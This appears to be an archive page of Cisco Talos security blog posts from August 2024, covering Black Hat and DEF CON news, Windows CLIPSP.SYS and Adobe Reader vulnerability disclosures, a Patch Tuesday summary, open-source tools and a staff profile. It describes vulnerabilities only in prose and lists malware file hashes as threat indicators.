An adversary could exploit these vulnerabilities by injecting malicious libraries into Microsoft's applications to gain their entitlements and user-granted permissions.

How multiple vulnerabilities in Microsoft apps for macOS pave the way to stealing permissions

Voting Village co-founder Harri Hursti told Politico the list of vulnerabilities ran “multiple pages.”

Thursday, August 15, 2024 14:00

As promised, I’m back this week to recap some of the top stories coming out of Black Hat and DEF CON.  

Also as promised, AI was the talk of Vegas during Hacker Summer Camp (or at least from what I’ve been reading and hearing, I wasn’t there in person). 

Several exhibitions and talks at both conferences showed how easy it is to create deepfake videos and potentially use them to spread fake news and disinformation. Two security researchers worked to deepfake themselves and even managed to trick people into believing it really was them on one end of a video conference call.  

Others on the show floor had the opportunity to try their hand at creating deepfakes with the help of the Defense Advanced Research Projects Agency (DARPA). One standout example was a fake video of former Royal Family member Meghan Markle being transposed onto the face of a reporter who could then speak in an approximation of Markle’s voice to say whatever she wanted to. 

The good news is that, for now, these types of deepfakes are also incredibly easy for tools and humans alike to detect.  

For example, Adobe’s Content Authenticity Initiative is working to place labels on images to indicate that they were originally human-made, and clicking on the image would allow the user to read more information about that image’s history and where and how it had been created. 

And in the case of the Meghan Markle deepfake, the SemaFor tool on display at the DEF CON village appropriately detected the image as fake using its scoring system (it didn’t help that the deepfake creator couldn’t account for the fact that the “creator” was wearing glasses).  

Security researchers also used DEF CON and Black Hat to show where potential security pitfalls lie with the rise of AI tools and software. 

One talk centered around how Microsoft’s AI Copilot could essentially be turned into an “automated phishing machine” by leaking personal information, and other researchers warned about an over-reliance on learned language models (LLMs) to write software code that often includes vulnerabilities and errors. 

Over in the DEF CON Voting Village, security researchers found their usual swath of vulnerabilities that could be used against popular voting machines and other hardware that will likely be used in the 2024 U.S. presidential election. While we don’t have many details on the specific vulnerabilities found, Voting Village co-founder Harri Hursti told Politico the list of vulnerabilities ran “multiple pages.” 

There are a few issues that came to light for me when I was reading about this research and bug hunting: One is that there isn’t enough time to implement many of these fixes before the November election, and there are just so many different pieces of equipment and manufacturers that it’s impossible to properly inspect all these devices. I may feel compelled to write more about this later, but it’s interesting to me that we as a country have managed to decide on essentially two cell phone manufacturers that we’re willing to buy from: Apple and Google. Yet there is no standard for the types, age and vendors that we rely on for our elections, and when they’re not in use, they just sit in storage.  

**The one big thing **

This month’s Microsoft Patch Tuesday includes updates for security vulnerabilities in Office, Visual Studio, Azure, CoPilot, Teams and more. Of the six zero-day vulnerabilities Microsoft disclosed as part of its regular patching cadence, half are local privilege escalation vulnerabilities, meaning adversaries could combine them with other flaws to make their attack more serious or with higher-level privileges. Cisco Talos’ Vulnerability Research team discovered four of the vulnerabilities Microsoft patched this week: CVE-2024-38184, CVE-2024-38185, CVE-2024-38186 and CVE-2024-38187. These are elevation of privilege vulnerabilities in the Microsoft Windows kernel-mode driver that could allow an attacker to gain SYSTEM-level privileges. Talos researchers also discovered eight vulnerabilities in CLIPSP.SYS, a driver used to implement Client License System Policy on Windows 10 and 11. 

**Why do I care? **

Talos discovered three issues, TALOS-2024-1971 (CVE-2024-38062) and TALOS-2024-1970 (CVE-2024-38062) and TALOS-2024-1969 (CVE-2024-38187), an adversary could exploit by sending the targeted system a specially crafted license blob, which could lead to a denial of service. TALOS-2024-1964 (CVE-2024-38184) is exploited in the same way, but in this case, could allow the adversary to bypass the usual security checks that take place and allow them to tamper with the license. By tampering with the license, an adversary could change its properties such as when the license expires, or even create a new license that could then be used with other applications downloaded from the Windows store. Two other out-of-bounds write vulnerabilities, TALOS-2024-1966 (CVE-2024-38186) and TALOS-2024-1988 (CVE-2024-38062), could lead to privilege escalation. And in both cases, the vulnerable functions could play into a sandbox escape attack. 

Microsoft also issued a patch for a zero-day vulnerability that was already being exploited in the wild and publicly disclosed. The company warned of CVE-2024-38200 last week, which could lead to the unauthorized disclosure of sensitive information to malicious actors. 

**So now what? **

Talos released a new Snort rule set that detects attempts to exploit some of the vulnerabilities disclosed Tuesday. Cisco Security Firewall customers should use the latest update to their ruleset by updating their SRU. Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. The rules included in this release that protect against the exploitation of many of these vulnerabilities are 63858 – 63861 and 63864 - 63878. There are also Snort 3 rules 300980 – 300988. Talos’ Vulnerability Roundup also has technical details on the eight CLIPSP.SYS vulnerabilities. 

**Top security headlines of the week **

**Secure messaging app Signal is now blocked in Venezuela and Russia, limiting a popular communication channel for activists and protestors in those countries.** In Russia, government officials have said that the app violates the country’s privacy legislation, while in Venezuela, the block comes after weeks of protests over the country’s disputed presidential election results. Signal is a popular option for users looking for encrypted messaging or hoping to avoid government censorship. The app told users that they could circumvent these blocks by turning on the app’s “censorship circumvention” settings or using a VPN to create a new account. Venezuela’s ruling party has also ordered that access to X/Twitter be restricted for 10 days, and YouTube also experienced a widespread outage in Russia that the company said was “not as a result of any technical issues on our side or action taken by us.” (The Verge, Engadget) 

**The FBI has shut down dozens of servers and the main leak site associated with the Radar ransomware group (aka Dispossessor).** Radar started out as a threat actor known for taking data stolen by the LockBit ransomware operators and offering it for sale on dark web forums, but eventually became its own self-sufficient ransomware operation. In a press release announcing the takedown over the weekend, the FBI said that Radar particularly focused on small-to-mid-sized businesses and organizations from the production, education, healthcare, financial services and transportation sectors. They identified 43 victims across the U.S., U.K., Argentina, Australia, Brazil, Canada, Poland, Germany and more. The group’s infrastructure included three servers in the U.S., three servers in the U.K., 18 servers in Germany, and eight U.S.-based domains, all of which were seized and displayed a takedown message from the FBI at the time of the takedown. (Dark Reading, Inc.) 

**The head of the U.S. Cybersecurity and Infrastructure Security Agency used her time at the Black Hat conference to call on software makers to adopt a security-by-design practice.** Jen Easterly, speaking in the keynote section of one of the largest cybersecurity conferences in the world, said that “We don’t have a cybersecurity problem, we have a software quality problem.” Easterly said many technology companies have voluntarily adopted CISA’s secure-by-design standards, which pledges to bake cybersecurity and vulnerability reviews into the design process of all new hardware and software products. “The cybersecurity industry was created to solve a problem created by another set of vendors, the technology companies and software makers. For decades tech vendors have been allowed to create insecure software,” she said. She also called on Congress to establish what she called a “liability regime” to hold companies responsible for designing insecure products and providing support to companies that due adhere to cybersecurity standards. (Inside AI Policy, CyberScoop)  

**Can’t get enough Talos? **

*   A refresher on Talos’ open-source tools and the importance of the open-source community 
*   Current attacks, targets, and other threat landscape trends 
*   As AI transforms cybersecurity, Cisco’s Martin Lee has only one piece of advice for IT managers: expect the unexpected 
*   Cisco Integrated Talos Threat Intelligence for All Splunk Users 

**Upcoming events where you can find Talos **

**_BSides Krakow_** **_(Sept. 14)_**  

_Krakow, Poland_ 

**_LABScon_** **_(Sept. 18 - 21)_** 

_Scottsdale, Arizona_

**_VB2024_** **_(Oct. 2 - 4)_**

_Dublin, Ireland_

**Most prevalent malware files from Talos telemetry over the past week **

**SHA 256:** 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507  
**MD5:** 2915b3f8b703eb744fc54c81f4a9c67f f  
**Typical Filename:** VID001.exe  
**Claimed Product:** N/A  
**Detection Name:** Win.Worm.Coinminer::1201

**SHA 256:** c67b03c0a91eaefffd2f2c79b5c26a2648b8d3c19a22cadf35453455ff08ead0  
**MD5:** 8c69830a50fb85d8a794fa46643493b2  
**Typical Filename:** AAct.exe  
**Claimed Product:** N/A  
**Detection Name:** PUA.Win.Dropper.Generic::1201

**SHA 256:** 161937ed1502c491748d055287898dd37af96405aeff48c2500b834f6739e72d  
**MD5:** fd743b55d530e0468805de0e83758fe9  
**Typical Filename:** KMSAuto Net.exe  
**Claimed Product:** KMSAuto Net  
**Detection Name:** W32.File.MalParent

**SHA 256:** 24283c2eda68c559f85db7bf7ccfe3f81e2c7dfc98a304b2056f1a7c053594fe  
**MD5:** 49ae44d48c8ff0ee1b23a310cb2ecf5a  
**Typical Filename:** nYzVlQyRnQmDcXk  
**Claimed Product:** N/A  
**Detection Name:** Win.Dropper.Scar::tpd

**SHA 256:** bea312ccbc8a912d4322b45ea64d69bb3add4d818fd1eb7723260b11d76a138a  
**MD5:** 200206279107f4a2bb1832e3fcd7d64c  
**Typical Filename:** lsgkozfm.bat  
**Claimed Product:** N/A  
**Detection Name:** Win.Dropper.Scar::tpd

AI, election security headline discussions at Black Hat and DEF CON

Eight of the vulnerabilities affect the license update feature for CLIPSP.SYS, a driver used to implement Client License System Policy on Windows 10 and 11.

Wednesday, August 14, 2024 12:02

Cisco Talos’ Vulnerability Research team recently discovered 11 vulnerabilities in Microsoft Windows CLIPSP.SYS and Adobe Acrobat Reader that were all disclosed this week as part of the company’s regular security updates.

For more on Patch Tuesday, check out Talos’ blog post here. 

Eight of the vulnerabilities affect the license update feature for CLIPSP.SYS, a driver used to implement Client License System Policy on Windows 10 and 11. The three others are use-after-free or out-of-bounds read vulnerabilities in Adobe Acrobat Reader, one of the most popular PDF readers on the market currently.

Microsoft and Adobe have patched the issues mentioned in this blog post, all in adherence to Cisco’s third-party vulnerability disclosure policy, while LevelOne has declined to release a fix.

For Snort coverage that can detect the exploitation of these vulnerabilities, download the latest rule sets from Snort.org, and our latest Vulnerability Advisories are always posted on Talos Intelligence’s website. 

**Multiple vulnerabilities in Windows CLIPSP.SYS**

_Discovered by Philippe Laulheret._

CLIPSP.SYS is a driver in Windows 10 and 11 that implements the Client License System Policy. The process of updating this license can be exploited by an adversary to carry out several different exploits.

Talos discovered three issues, TALOS-2024-1971 (CVE-2024-38062) and TALOS-2024-1970 (CVE-2024-38062) and TALOS-2024-1969 (CVE-2024-38187), an adversary could exploit by sending the targeted system a specially crafted license blob, which could lead to a denial of service.

TALOS-2024-1964 (CVE-2024-38184) is exploited in the same way, but in this case, could allow the adversary to bypass the usual security checks that take place and allow them to tamper with the license. By tampering with the license, an adversary could change its properties such as when the license expires, or even create a new license that could then be used with other applications downloaded from the Windows store. 

Two out-of-bounds write vulnerabilities, TALOS-2024-1966 (CVE-2024-38186) and TALOS-2024-1988 (CVE-2024-38062), could lead to privilege escalation. And in both cases, the vulnerable functions could play into a sandbox escape attack.

TALOS-2024-1965 (CVE-2024-38185) and TALOS-2024-1968 (CVE-2024-38062) are also out-of-bounds read vulnerabilities, but in their cases, lead to the disclosure of sensitive information and an out-of-bounds kernel read, respectively.

**Adobe Acrobat Reader vulnerability could lead to remote code execution**

_Discovered by KPC._

Adobe Acrobat Reader contains three vulnerabilities, one of which could allow an attacker to execute arbitrary code. 

TALOS-2024-2002 (CVE-2024-41832) and TALOS-2024-2003 (CVE-2024-41835) exist in the CoolType font processor in Reader. An adversary could embed a specially crafted font in a PDF, and then trick the targeted user into opening that PDF, to exploit these vulnerabilities. 

This could allow the adversary to view sensitive contents of arbitrary memory, which could aid in further exploitation and exploit mitigation bypass.

TALOS-2024-2009 (CVE-2024-41830) is the most serious of the issues Talos discovered, with a CVSS score of 8.8 out of 10. If an adversary tricks a user into opening a specially crafted PDF, malicious JavaScript code in the PDF could trigger the reuse of a previously freed object, leading to memory corruption and potentially arbitrary code execution.

Talos discovers 11 vulnerabilities between Microsoft, Adobe software disclosed on Patch Tuesday

The most serious of the issues included in August’s Patch Tuesday is CVE-2024-38063, a remote code execution vulnerability in Windows TCP/IP.

Tuesday, August 13, 2024 15:12

Microsoft disclosed six security vulnerabilities that are actively being exploited across its products as part of the company’s regular Patch Tuesday security update.  

In all, August’s monthly round of patches from Microsoft included 87 vulnerabilities, seven of which are considered critical. In addition to the zero-days disclosed Tuesday, Microsoft also fixed a security issue that had already been publicly disclosed: CVE-2024-21302, a vulnerability in Microsoft Office that could result in unauthorized disclosure of sensitive information to malicious actors. Microsoft initially warned about the possibility that attackers could exploit this vulnerability in the wild last week, including being able to reverse older software patches that could re-open them to past vulnerabilities. 

Cisco Talos’ Vulnerability Research team discovered four of the vulnerabilities Microsoft patched this week: CVE-2024-38184, CVE-2024-38185, CVE-2024-38186 and CVE-2024-38187. These are elevation of privilege vulnerabilities in the Microsoft Windows kernel-mode driver that could allow an attacker to gain SYSTEM-level privileges.  

The most serious of the issues included in August’s Patch Tuesday is CVE-2024-38063, a remote code execution vulnerability in Windows TCP/IP. An unauthenticated attacker could exploit this vulnerability by repeatedly sending specially crafted IPv6 packets to a targeted Windows machine that could enable remote code execution. Systems that have IPv6 disabled are not susceptible to this vulnerability.  

CVE-2024-38063 has a severity score of 9.8 out of 10 and is listed as “more likely” to be exploited. 

Two other remote code execution vulnerabilities, CVE-2024-38159 and CVE-2024-38160, exist in Windows Network Virtualization, and another, CVE-2024-38140, exists in the Windows Reliable Multicast Transport Driver. All three are considered critical. 

Two of the vulnerabilities already being exploited in the wild are CVE-2024-38178, a memory corruption vulnerability in the Microsoft Scripting Engine, and CVE-2024-38193, an elevation of privilege vulnerability in the Windows Ancillary Function Driver. Though they are both zero-days, Microsoft only lists them as being “important.” 

Lastly, we’d also like to highlight two vulnerabilities in the Secure Boot security feature, CVE-2024-38090 and CVE-2024-28918, which are rated critical and important, respectively.  

A complete list of all the other vulnerabilities Microsoft disclosed this month is available on its update page. 

In response to these vulnerability disclosures, Talos is releasing a new Snort rule set that detects attempts to exploit some of them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Cisco Security Firewall customers should use the latest update to their ruleset by updating their SRU. Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. 

The rules included in this release that protect against the exploitation of many of these vulnerabilities are 63858 – 63861 and 63864 - 63878. There are also Snort 3 rules 300980 – 300988.

Talos discovers Microsoft kernel mode driver vulnerabilities that could lead to SYSTEM privileges; Seven other critical issues disclosed

Open-source software that is free to download, deploy and modify is a vital component in the fight for cyber security. Freely available software not only helps defend systems that would otherwise be unprotected, but it also allows people to learn and develop vital cybersecurity skills. In this post, we review

Tuesday, August 13, 2024 08:20

Open-source software that is free to download, deploy and modify is a vital component in the fight for cyber security. Freely available software not only helps defend systems that would otherwise be unprotected, but it also allows people to learn and develop vital cybersecurity skills. In this post, we review how Cisco Talos supports open-source software and initiatives.  

The adoption of the early World Wide Web was greatly helped by free software. The GNU Project and the Apache Software Foundation released programs allowing anyone to create their own webserver. Administrators and engineers could practice and hone their skills in operating and developing on the platform, leading to a motivated, self-trained workforce that could apply their skills.  

Open-source software helps drive innovation. Depending on the terms of the license, open-source software can be incorporated into new software packages and services. This allows innovators to focus on providing new functionality and solving problems without having to spend valuable development time replicating perfectly good software that is already available. 

Developers need and deserve recompense; everyone needs to eat and pay their bills. However, open-source software is often developed as a non-commercial endeavor to solve a particular problem or to provide functionality that is too important to be left to the whims of private commerce. The inclusion of open-source software in other projects and services can help open-source developers fulfill objectives in spreading the open-source creed, through solving a problem well or supporting the wider community. Often, the success of an open-source project can bring employment opportunities to those who are skilled in developing or maintaining the original software, or commercial licensing opportunities. 

Cisco and Talos are committed to protecting the internet. One of the ways that we achieve this is by publishing open-source tools to enable users to protect systems, to learn about how to detect and block threats, and by providing educational content to help train the future cyber security workforce. 

The Cisco Networking Academy has trained over 20 million students in 190 countries helping people learn and gain employment in network and security. Through the Skills for All initiative, the academy offers free training and courses to help anyone build, deploy and secure technology as well as forge a career.  

Open-source security tools provide learning and development opportunities, but most importantly allow the wider security community to contribute to the global fight against cyber threats. For many systems across the planet, open-source solutions are the only protections stopping systems from becoming compromised. 

In addition to all our open-source tools, Talos has a whole range of tools, including ransomware decryptors, and data available on our GitHub repository￼. Providing open-source security software for free and supporting the community that works with these tools allows us to fulfill our mission to protect the internet and make life difficult for the bad guys.  

Snort is Talos’ open-source IDS/IPS system, which detects network-based threats and helps troubleshoot network issues. Commercial licensing allows Snort to be integrated as part of third-party solutions. Licensed solutions are deployed on over 450,000 systems across the globe, which in turn are likely to protect further systems downstream.  

Snort dates back to 1998, having undergone continuous development and innovation over the years. The latest version of the engine released in March is the first to include machine learning capabilities, allowing Snort to learn autonomously how to identify malicious network traffic, demonstrating our continued commitment to the platform. 

The open-source Snort rule base is curated and verified by Talos but largely developed by the open-source community. The twice-weekly rule release is currently downloaded by over 60 000 users.  

ClamAV is our open-source anti-malware engine. This software is also widely deployed in third-party solutions and services, notably in scanning inbound email and web connections, as well as providing end-point protection. We are aware of more than 18 million installations which we are proud to help protect.  

Ultimately, we will succeed through sharing knowledge and tools, and most importantly supporting each other. Try out one of the Skills for Allcourses, or download one of our open-source tools. Free software offers the possibility of both developing skills and solving problems.

A refresher on Talos’ open-source tools and the importance of the open-source community

As with everything nowadays, politics are sure to come into play.

Thursday, August 8, 2024 14:00

Over the next two weeks, two of the largest cybersecurity conferences in the world will take place in Las Vegas: Black Hat and DEF CON. 

That means product announcements, buzzwords and stories about “X smart appliance could burn your house down!” or something like that. Over the next two weeks, I’ll be using this space to catch readers up on the top stories, trends and talking points to come out of Hacker Summer Camp. If you’re on the ground in Vegas, follow along with us on Twitter to keep track of our talks and events.  

To no one’s surprise, AI is likely going to be in the spotlight all week, especially generative AI. Many companies will use these tools to spin up new cybersecurity products and protections, and other researchers are sure to point out the potential security pitfalls of emerging technologies.  

There is a dedicated full-day workshop to discuss holding generative AI accountable, including potential legislation that outlines how generative AI models are trained and using whose content. And AI Village at DEF CON is sure to turn up a slew of vulnerabilities in AI tools while highlighting how researchers can best disclose and help patch these security issues.  

In the vein of “how to hack X” headlines that I mentioned before, Talos’ own Dan Mazzella is presenting research on how an attacker could take over some cars’ Android-based infotainment systems to steal user data.  

Some of the systems used in Ford, Honda and GM cars could be exploited to steal data that is being transferred between the so-called “head unit” and a mobile device connected to the car, including text messages, contacts, photos and other private user information.  

And as with everything nowadays, politics are sure to come into play. With the recent news that Kamala Harris is taking over as the Democratic Party’s likely nominee for the upcoming U.S. presidential election, experts and regulators are trying to figure out what a potential Harris presidency would mean for cybersecurity and AI policy.  

Hackers are also hosting the year’s first cybersecurity-focused fundraiser for a presidential candidate with DEF CON organizers taking the lead on supporting Harris after she was supportive of the election security community in past years.  

Other elections around the globe also have cybersecurity implications, as Black Hat’s keynote will cover with (among others) Jen Easterly, the director of the U.S. Cybersecurity and Infrastructure Security Agency. Disinformation and fake news are always swirling online about any political candidate, regardless of country, and AI and deepfakes have only worsened the problem.  

And that’s before you get into any actual attempts to change votes or hack voting systems. 

**The one big thing **

Cisco Talos is actively tracking multiple malware campaigns that utilize NetSupport RAT for persistent infections. These campaigns evade detection through obfuscation and updates. Talos researchers identified multiple obfuscation and evasion techniques being used by the campaign and created appropriate detection to keep users protected. By identifying specific weaknesses in the campaign’s obfuscation techniques and identifying indicators of compromise (IOCs), we can create highly accurate detection of this campaign. 

**Why do I care? **

NetSupport Manager has been commercially available for remote device administration since 1989. Like many tools in the IT remote support industry, NetSupport Manager has been weaponized by threat actors who either cannot or do not wish to develop their own RAT. Adversaries first started using NetSuport for malicious purposes in 2017, and at this point, most security vendors widely recognize this software as a RAT. The 2020s' shift to remote work for many office workers marked an increased use of NetSupport RAT in more phishing and drive-by download campaigns, as well as being used alongside other loaders. This campaign is the most notable use of NetSupport RAT in recent years, with hundreds of known stager variants across dozens of domains used in a large-scale malicious advertising campaign. Thankfully, Snort can provide a strong defense before this malware reaches endpoints. 

**So now what? **

Talos’ first entry in our new series, “The Deep Dive with NDRT,” we dive into how our analysts craft protection against NetSupport RAT and the newest Snort rules to keep users safe from this threat.  

**Top security headlines of the week **

**A French Olympic site and cultural institution was targeted with a cyber attack over the weekend, though the effects appear to be limited.** Security experts and Olympics organizers largely expected there to be several efforts to try and disrupt the games. Despite false reports that adversaries had encrypted data belonging to the Grand Palais Réunion des musées nationau, the venue said in a statement that as of Monday morning, “no data extraction has been detected.” The institution most famously oversees the Louvre, one of the most famous art museums in the world. Its venues hosted several Olympics-related exhibitions and events over the past week, including fencing and Taekwondo competitions. The attack appears to be attempted ransomware, though an investigation with the ANSSI, France’s cybersecurity agency, is still underway. "This only concerns our internal network of shops, and not even the other activities of the RMN-Grand Palais. We immediately disconnected everything that was vital and called on the special state unit that deals with this type of problem, the French Computer Security Agency,” the Grand Palais director said in a statement after the attempted attack. (CyberScoop, Dark Reading) 

**A cyber attack knocked out Mobile Guardian, a U.K.-based mobile device management software used in the U.K.** The event largely affected students and schools in Singapore, which the Ministry of Education says led to thousands of students having their devices completely wiped. Mobile Guardian advertises itself as a cross-platform solution for K-12 schools to monitor and manage their devices. “Based on preliminary checks, about 13,000 students in Singapore from 26 secondary schools had their devices wiped remotely by the perpetrator,” the Singaporean education ministry said in a statement. Adversaries seemed to have removed some targeted devices from Mobile Guardian’s network and completely wiped the devices. The company said in a statement this week that the outage affected instances in North America, Europe and Singapore. The incident appears to stem from a misconfiguration that caused an IT outage on July 30. (TechCrunch, Bleeping Computer) 

**A ransomware attack on a blood donation non-profit forced many hospitals to tap into their emergency blood supplies and host last-minute drives.** OneBlood, which provides blood samples to many hosptials in the Southeastern U.S., was hit with a ransomware attack that forced most of its network offline. The non-profit had to switch to manual processes for several days, including printing out its own labels and having donors fill out paper forms to donate blood, which delayed their usual supply chain to hospitals. Some health care facilities had to delay non-emergency procedures until after the blood donor supply had returned to normal. Late last week, OneBlood told its more than 250 hospital partners to activate their critical blood shortage protocols, which included holding last-minute drives and calling for volunteers to donate blood asap. As of Wednesday, OneBlood says its software is returning to normal. The process was made even more difficult by the presence of Hurricane Debby, which moves through Florida and Georgia, dumping inches of rain and causing flooding in states that were heavily affected by OneBlood’s outage. (Axios, CBS News) 

**Can’t get enough Talos? **

**Upcoming events where you can find Talos **

**_Defcon_** **_(Aug. 8 – 11)_** 

_Las Vegas, Nevada_ 

**_BSides Krakow_** **_(Sept. 14)_**  

_Krakow, Poland_ 

**Most prevalent malware files from Talos telemetry over the past week **

**SHA 256:** 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507  
**MD5:** 2915b3f8b703eb744fc54c81f4a9c67f f  
**Typical Filename:** VID001.exe  
**Claimed Product:** N/A  
**Detection Name:** Win.Worm.Coinminer::1201

**SHA 256:** c67b03c0a91eaefffd2f2c79b5c26a2648b8d3c19a22cadf35453455ff08ead0  
**MD5:** 8c69830a50fb85d8a794fa46643493b2  
**Typical Filename:** AAct.exe  
**Claimed Product:** N/A  
**Detection Name:** PUA.Win.Dropper.Generic::1201

**SHA 256:** 161937ed1502c491748d055287898dd37af96405aeff48c2500b834f6739e72d  
**MD5:** fd743b55d530e0468805de0e83758fe9  
**Typical Filename:** KMSAuto Net.exe  
**Claimed Product:** KMSAuto Net  
**Detection Name:** W32.File.MalParent

**SHA 256:** 24283c2eda68c559f85db7bf7ccfe3f81e2c7dfc98a304b2056f1a7c053594fe  
**MD5:** 49ae44d48c8ff0ee1b23a310cb2ecf5a  
**Typical Filename:** nYzVlQyRnQmDcXk  
**Claimed Product:** N/A  
**Detection Name:** Win.Dropper.Scar::tpd

**SHA 256:** bea312ccbc8a912d4322b45ea64d69bb3add4d818fd1eb7723260b11d76a138a  
**MD5:** 200206279107f4a2bb1832e3fcd7d64c  
**Typical Filename:** lsgkozfm.bat  
**Claimed Product:** N/A  
**Detection Name:** Win.Dropper.Scar::tpd

The top stories coming out of the Black Hat cybersecurity conference

Pentney and his team are threat hunters and researchers who contribute to Talos’ research and reports shared with government and private sector partners.

Monday, August 5, 2024 08:00

As the adage goes: “You don’t know what you don’t know.” 

For Ryan Pentney and his team, they know what they don’t know. And they wake up every morning trying to figure out how they can answer those questions about emerging threats and some of the largest state-sponsored actors in the world. 

Pentney is Cisco Talos’ threat intelligence lead for the Asia-Pacific region, and it's his job to lead investigations into active malware threats, international threat groups and anything that’s on defenders’ minds.  

“We’re always thinking about, ‘What do we know, and what do we not know?’ And we try to start with the 'What do we know?' part,” Pentney said. “What do I need to answer these questions? Do we need to look at other methods or new tools for generating information? Are there partners we want to have discussions with?” 

Pentney and his team are threat hunters and researchers who contribute to Talos’ research and reports shared with government and private sector partners. He is specifically focused on the tactics threat actors used to perform these attacks and their potential motivations.  

“How can we figure out how to identify the actor in the future if they’re involved in other attacks? Do they have specific targets, or is it more widespread?” Pentney said. “At the end of the day, we try to figure out what we need to do to keep our customers safe.” 

But this is only the latest stop on Pentney’s journey through Talos and its predecessor, Sourcefire. In fact, Pentney joined Sourcefire almost immediately after graduating college, his first “real” job in the cybersecurity field. 

Over the past 17 years at Sourcefire and Talos, he’s done everything from vulnerability research and discovery to Snort rule writing and application development.  

His first role at Sourcefire was working under Lurene Grenier. At the time, it was only a group of six people working on detection inside Sourcefire’s Vulnerability Research Team (VRT) writing rules and signatures for the Snort intrusion prevention system and ClamAV anti-virus software. Pentney attended college studying in the broader field of computer science, learning how to write in the C and C++ languages, but at the time, “cybersecurity-focused programs weren't common,” Pentney says.  

__Pentney (second from left) was once part of a hockey team with some of his Sourcefire/Talos colleagues.__

So, much of his education had to come on the job. 

“When new vulnerabilities came out, we would sometimes need to reverse-engineer the patches to figure out what changes had taken place, and from there figure out what the original vector might have been,” he said. 

Eventually, he moved to the vulnerability research team, where he spent years searching for vulnerabilities in a wide range of products and software and disclosing potential exploitation vectors to vendors so they could be patched. 

Then, in 2015, he joined the threat hunting team under Matt Olney, who was also one of Pentney’s original Sourcefire colleagues.  

__Pentney speaking at a conference in 2016.__

During his Sourcefire days, Pentney says he is most proud of working on Razorback, an open-source framework inside Snort that enabled the advanced processing of data to protect against client-side attacks.  

His work on Razorback deepened Pentney’s interest in how exploits work and how adversaries write exploits in the first place, all things that Lurene helped teach him. Pentney even ended up advancing to the point that, for many years, he taught Talos’ in-house Exploit Development Class for customers and employees. 

“I still very much enjoy teaching whenever I get the opportunity,” Pentney said. 

When Pentney joined Sourcefire in 2008, he was only part of a team of less than 10 people where he was a solo contributor. Now, Talos is made up of more than 500 people and manages a team of 10.  

“We’ve greatly expanded our areas of focus, we have a lot of varied teams that specialize in a lot of different things, and we have our own branding and our own set of folks in charge of that,” Pentney said of Talos’ growth over the past 10 years. “It feels normal now, but I think I would have been overwhelmed if you had told me 16 years ago that we’d be working on the kinds of things we’re working on now.” 

Several things have kept Pentney at the company for almost 17 years, much of which centered around his ability to pivot between different roles in the company and learn along the way. Even today, Pentney says there is always someone at Talos he’s looking to learn from. 

From day one on the job, Pentney joked that “there were so many experts, I knew they were speaking English, but I didn’t recognize how the information was put together.” And now he’s advanced enough to the point that he is working on major international events and incidents, and now is the one disseminating that information to partners, customers and users. 

The key to Talos’ success over the years while expanding in scope and size is that management has always encouraged everyone at the company to learn and grow, Pentney said. He also fondly looks back on the many opportunities to bond with the original team at Sourcefire who are still at Talos today, including many people on the Network threat Detection and Response team who taught Pentney how to write Snort rules in the first place. 

“The overall level of expertise you can find anywhere at Talos, the openness of people in terms of wanting to share that with you if you’re interested, the teaching mentality that people have, has always been amazing,” Pentney said. “Management has always been very supportive of that, of personal growth, and expanding your mindset.” 

Looking forward into the next 10 years of Talos, Pentney said he plans on learning more about state-sponsored activity and researching new ways to track larger threat actors.  

“We are looking at leveraging our telemetry in ways that we had never considered before. There are mathematical and statistical methods we may be able to use to uncover some insights that may not be obvious,” he said.  

Outside of the office, Pentney is an avid skier and tries to take one trip out to the Rocky Mountains every year with a group of friends. And, he joked “like most of us at Talos” he enjoys playing video games. 

He also enjoys studying and learning new languages (a common talent among the Talos Threat Intelligence and Interdiction team) and speaks four languages fluently.  

__Pentney (second from left) and other Talos threat hunters gather for a team offsite in 2023.__

One thing many of his teammates, even the original Sourcefire ones, don’t know about him is that he likes to play the piano.  

“That’s something I find really relaxing and I don’t get to show off enough. It’s a really nice, meditative activity,” he said.  

If you’d like to look at some of the work Pentney and his team have completed recently, they regularly contribute to the Talos Incident Response Quarterly Trends reports and conduct intelligence on-demand requests through a Cisco Talos Incident Response retainer.

Ryan Pentney reflects on 10 years of Talos and his many roles from the Sourcefire days

The lesson for users, especially if you’re a private company that primarily uses GitHub, is just to understand the inherent dangers of using open-source software.

Thursday, August 1, 2024 14:00

A recently discovered security issue in GitHub and other, similar, control system products seem to fit into the classic “it’s a feature, not a bug” category. 

Security researchers last week published their findings into some research of how deleted forks in GitHub work, potentially leaving the door open for a malicious actor to steal a project key and then view deleted forks and versions of any project on GitHub. 

This may not necessarily even be a \*new\* discovery, because users on social media were quick to point out that these products have always been designed this way, so it’s not like a new sort of exploit had just been published. But the publishing of these findings came after Truffle Security says a major tech company accidentally leaked a private key for an employee GitHub account, and despite totally deleting the repo thinking that would take care of the leak, it was still exposed and accessed by potentially malicious users.  

This potential issue has not been tested in similar software like GitLab or Bitbucket, but conceivably, they’ve all been designed in the same way. The major difference for GitHub is that deleted or unpublished commits can be downloaded via a fork if the user has the correct identifying hash (or at least a portion of it).  

The issue here is there is no real patch or fix to address this issue, and now it’s widely known and been publicized on the internet.  

GitHub told The Register that this is part of how the software is designed, and there doesn’t appear any efforts underway to change that. 

“GitHub is committed to investigating reported security issues. We are aware of this report and have validated that this is expected and documented behavior inherent to how fork networks work. You can read more about how deleting or changing visibility affects repository forks in our documentation,” the company said in a statement to online publication The Register. 

The lesson for users, especially if you’re a private company that primarily uses GitHub, is just to understand the inherent dangers of using open-source software like those projects that are created and managed on GitHub. (Martin Lee and I will be discussing more in tomorrow morning’s episode of Talos Takes.) 

The other option is that, if you’re a GitHub user and at some point, published a key, you should probably just assume someone has copied it by now. That means not only deleting references to that key but rotating the key and checking if it was used improperly.  

**The one big thing **

Cisco Talos recently discovered a malicious campaign that compromised a Taiwanese Government Affiliated Research Institute that started as early as July 2023, delivering Shadowpad malware, Cobalt Strike and other customized tools for post-compromise activities. The activity conducted on the victim endpoint matches the Chinese hacking group APT41. The combined use of malware, open-source tools and projects procedures and post-compromise activity matches this group method of operation. ShadowPad, widely considered the successor of PlugX, is a modular remote-access-trojan (RAT) only seen sold to Chinese hacking groups. 

**Why do I care? **

